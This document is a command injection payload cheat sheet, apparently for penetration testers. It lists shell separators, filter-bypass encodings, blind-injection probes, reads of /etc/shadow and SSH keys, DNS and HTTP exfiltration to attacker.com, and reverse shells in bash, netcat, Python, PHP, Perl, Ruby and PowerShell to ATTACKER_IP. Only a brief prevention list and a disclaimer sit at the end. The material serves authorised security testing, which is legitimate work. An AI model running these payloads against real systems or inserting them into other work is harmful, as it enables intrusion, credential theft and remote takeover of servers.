Command Injection Payloads
Command Injection (also known as OS Command Injection or Shell Injection) is a vulnerability that allows an attacker to execute arbitrary operating system commands on the server hosting an application. This can lead to full system compromise, data theft, and unauthorized access.
Command Separators
Linux/Unix
; # Executes commands sequentially
& # Runs command in background
&& # Executes if previous command succeeds
| # Pipes output to next command
|| # Executes if previous command fails
\n # Newline (0x0a)
` # Command substitution (backticks)
$() # Command substitution
Windows
& # Executes commands sequentially
&& # Executes if previous command succeeds
| # Pipes output to next command
|| # Executes if previous command fails
%0a # Newline
Basic Payloads
Linux/Unix
; whoami
& whoami
&& whoami
| whoami
|| whoami
; id
; cat /etc/passwd
; ls -la
; pwd
; uname -a
; hostname
`whoami`
$(whoami)
;`whoami`
;$(whoami)
&& whoami &
& whoami &
Windows
& whoami
&& whoami
| whoami
|| whoami
& ver
& dir
& ipconfig
& hostname
& net user
& systeminfo
Multiline Execution
%0awhoami
%0aid
\nwhoami
\nid
# Backslash newline
cat /et\
c/pa\
sswd
Blind Command Injection
When direct output is not visible.
Time Delays
Linux:
; sleep 5
& sleep 10
&& sleep 5 &
| sleep 5
|| sleep 5
; ping -c 10 127.0.0.1
Windows:
& timeout /t 5
&& ping -n 10 127.0.0.1
| timeout 5
Out-of-Band Detection
DNS Exfiltration:
; nslookup attacker.com
; dig attacker.com
; host attacker.com
; ping -c 1 attacker.com
# With data exfiltration
; nslookup `whoami`.attacker.com
; dig $(whoami).attacker.com
HTTP Requests:
; curl http://attacker.com
; wget http://attacker.com
; curl http://attacker.com/$(whoami)
; wget http://attacker.com/?data=$(cat /etc/passwd | base64)
Writing to Web-Accessible Files
; whoami > /var/www/html/output.txt
; id > /tmp/output.txt
; cat /etc/passwd > /var/www/html/data.txt
Bypass Techniques
Bypass Without Spaces
# Using $IFS (Internal Field Separator)
;cat$IFS/etc/passwd
;cat${IFS}/etc/passwd
;cat$IFS$9/etc/passwd
# Using tabs
;cat%09/etc/passwd
# Using brace expansion
;{cat,/etc/passwd}
# Using input redirection
;cat</etc/passwd
;sh</dev/tcp/attacker.com/4444
# Using $()
;cat$(echo$IFS)/etc/passwd
Quote Manipulation
# Single quotes
;w'h'o'am'i
;c'a't' '/e't'c'/p'a's's'w'd
# Double quotes
;w"h"o"am"i
;c"a"t" "/e"t"c"/p"a"s"s"w"d
# Mixed quotes
;who'am'i
;c'at' /etc/pass'wd
Backslash Obfuscation
;w\ho\am\i
;c\at \/etc\/pass\wd
;/\b\i\n/////s\h
Variable Expansion
;cat ${test//hhhhm/}
;cat $HOME$NO_VAR/../../etc/passwd
;who$@ami
;who$()ami
Wildcards
;/???/??t /???/?asswd
;/???/c?t /???/p??s??
;cat /e*c/p*wd
Hex/Octal Encoding
# Hex
;cat \x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64
;\x63\x61\x74 /etc/passwd
# Octal
;cat \057\145\164\143\057\160\141\163\163\167\144
Base64 Encoding
# Encode command
;echo d2hvYW1p | base64 -d | sh
;bash<<<$(base64 -d<<<d2hvYW1p)
# whoami in base64
;bash<<<$(echo$IFS'whoami'|base64 -d)
Case Manipulation (Windows)
# Commands are case-insensitive on Windows
& WhoAmI
& WhOaMi
& WHOAMI
Comment Breaking
;w#ho#am#i
;cat /e'#'tc/pa'#'sswd
Tilde Expansion
;cat ~+/../etc/passwd
;cat ~-/../etc/passwd
Data Exfiltration
File Reading
; cat /etc/passwd
; cat /etc/shadow
; cat ~/.bash_history
; cat ~/.ssh/id_rsa
; cat /var/www/html/config.php
; cat /proc/self/environ
Sending Data via DNS
; nslookup `cat /etc/passwd | base64`.attacker.com
; dig $(cat /etc/hostname).attacker.com
Sending Data via HTTP
; curl http://attacker.com/$(whoami)
; wget http://attacker.com/?data=$(cat /etc/passwd | base64)
; curl -X POST -d "data=$(cat /etc/passwd)" http://attacker.com
Email Exfiltration
; cat /etc/passwd | mail -s "Data" attacker@example.com
Reverse Shells
Bash Reverse Shell
; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
; /bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
; 0<&196;exec 196<>/dev/tcp/ATTACKER_IP/4444; sh <&196 >&196 2>&196
Netcat Reverse Shell
; nc ATTACKER_IP 4444 -e /bin/sh
; nc ATTACKER_IP 4444 -e /bin/bash
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f
Python Reverse Shell
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP Reverse Shell
; php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Perl Reverse Shell
; perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby Reverse Shell
; ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
PowerShell Reverse Shell (Windows)
& powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Platform-Specific Payloads
Linux-Specific
# System Information
; cat /etc/os-release
; cat /proc/version
; cat /proc/cpuinfo
; cat /proc/meminfo
# User Enumeration
; cat /etc/passwd
; cat /etc/shadow
; cat /etc/group
; id
; whoami
; w
; last
# Network Information
; ifconfig
; ip addr
; netstat -antup
; ss -tuln
; iptables -L
# File System
; find / -name "*.conf" 2>/dev/null
; find / -perm -4000 2>/dev/null
; find / -writable -type f 2>/dev/null
# Process Information
; ps aux
; top -n 1
; pstree
Windows-Specific
# System Information
& systeminfo
& ver
& wmic os get caption
& wmic computersystem get model,name
# User Enumeration
& whoami
& whoami /priv
& net user
& net localgroup administrators
& net user Administrator
# Network Information
& ipconfig /all
& netstat -ano
& arp -a
& route print
# File System
& dir /s /b *.config
& dir /s /b *.txt
& type C:\Windows\System32\drivers\etc\hosts
# Process Information
& tasklist
& wmic process get caption,executablepath,processid
& wmic service list brief
Advanced Techniques
Argument Injection
When the command is fixed but arguments can be controlled:
# For tools like tar, rsync, git, etc.
--checkpoint=1
--checkpoint-action=exec=sh exploit.sh
# Git
--upload-pack='bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
# Wget
--post-file=/etc/passwd http://attacker.com
Environment Variable Injection
; export PATH=/tmp:$PATH
; env
; printenv
Polyglot Payloads
';whoami;'
";whoami;"
`whoami`
$(whoami)
${whoami}
Prevention Best Practices
- Avoid OS Commands: Use built-in library functions instead of system calls
- Input Validation: Whitelist allowed characters (alphanumeric only when possible)
- Escape Special Characters: Properly escape shell metacharacters
- Use Safe APIs: Use language-specific safe execution methods
- Principle of Least Privilege: Run applications with minimal permissions
- Logging and Monitoring: Monitor for suspicious command execution patterns
- Sandboxing: Execute commands in isolated environments
Testing Tools
- Commix - Automated command injection tool
- Burp Suite - Web application security testing
- OWASP ZAP - Security scanner
- Metasploit - Penetration testing framework
⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal.